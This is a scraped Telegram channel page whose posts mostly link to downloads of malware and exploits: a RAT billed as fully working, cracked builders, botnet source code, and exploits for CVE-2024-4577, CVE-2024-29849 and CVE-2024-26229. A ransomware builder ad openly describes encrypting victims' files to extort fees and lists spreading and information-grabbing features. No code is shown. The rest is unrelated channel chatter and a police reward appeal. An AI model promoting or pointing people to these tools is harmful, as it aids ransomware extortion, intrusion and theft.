CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ‘1
Forwarded from OSINT AMBITION (Dheeraj Yadav)
It's party time ๐ŸŽ‡๐ŸŽ‰๐ŸŽŠ

So, we have completed 500 subscribers on our newsletter last week. As always, we are late again.

As we have accomplished this goal, we will now be moving forward to achieve 1k subs soon.

Also, we will be changing the newsletter design and it will be having many new section and a lot more useful information than ever before.

If you are interested in helping us by giving us feedback, drop a dm to @dheerajydv19

https://osintambition.substack.com/

Don't forget to subscribe if you haven't done yet.
#osint #osintforgood #socmint #osinttools #osintnews #weeklyupdate #infosec
https://system32.ink/andromeda-rat-working/

Andromeda Rat 4.5 100% Working | Tested
๐ŸŽ‰1
https://system32.in/topic/automate-xss-using-dalfox-waybackurl-gf-patterns/

Automate XSS using Dalfox, WaybackURL, GF Patterns
๐Ÿ‘2
This media is not supported in your browser
VIEW IN TELEGRAM
https://system32.ink/php-cgi-argument-injection-cve-2024-4577-rce-exploit/

PHP CGI Argument Injection (CVE-2024-4577) RCE Exploit
๐Ÿ‘2
https://system32.ink/hidden-cplapplet-builder-v3-cracked-with-source-code/

Hidden CPLApplet Builder V3 Cracked With Source Code
https://system32.ink/cosanostra-v-1-2-http-botnet-source-code/

CosaNostra v.1.2 HTTP Botnet + Source Code
๐Ÿ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
MAIN NARENDRA DAMODARDAS MODI

MODI 3.0 IS OFFICIALLY HERE ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ
๐Ÿ”ฅ18๐Ÿ’”2๐Ÿพ1๐Ÿ‘พ1
https://system32.ink/enccn-ransomware-builder/

ENCCN Ransomware Builder Download


The latest edition of this software is beautifully established, that can help you to encrypt documents on the inflamed device. It allows the users to display a message to inform other users that their files are locked.

Cybercriminals can demand a fee from their targets to restore their data, and in this way after they get the fee so it is on them whether they restore the victim's data or not.

โ€‹
Featuresโ€‹
There are so many features in the enccn ransomware builder windows 10 software and some of them are as follows below.
Download Malware
Fully featured
Media library
Execute the malware
Windows shortcut exploit
Using reg
Easy handling
Windows shortcuts
Registry injection
Premium version
Malicious email attachments
Configuration
Fast
Stable
Come with advanced features
Support all kinds of browsers
Grab information about anyone
Malware maker
Encrypt files
Multiple languages
Spreader
Customizable
Many more.
TRYHACKME ONE MONTH VOUCHER AVAILABLE (PAID)

DM
@CYBERDIN IF YOU NEED

CHECK
@PROOFSCDI FOR PROOFS
https://system32.ink/veeam-backup-enterprise-manager-authentication-bypass-cve-2024-29849-exploit/

Veeam Backup Enterprise Manager Authentication Bypass CVE-2024-29849 Exploit
REASI POLICE ANNOUNCE 20 LACS REWARD FOR INFORMATION OF TERRORIST- RELEASES SKETCH

Reasi police appeals general public to provide any reliable information on the following contact nos-
SSP Reasi - 9205571332
ASP Reasi - 9419113159
DySP HQ Reasi - 9419133499
SHO Pouni - 7051003214
SHO Ransoo- 7051003213
PCR Reasi- 9622856295
๐Ÿ‘10๐Ÿ‘พ1
https://system32.ink/windows-csc-service-elevation-of-privilege-lpe-cve-2024-26229-exploit/

Windows CSC Service Elevation of Privilege LPE CVE-2024-26229 Exploit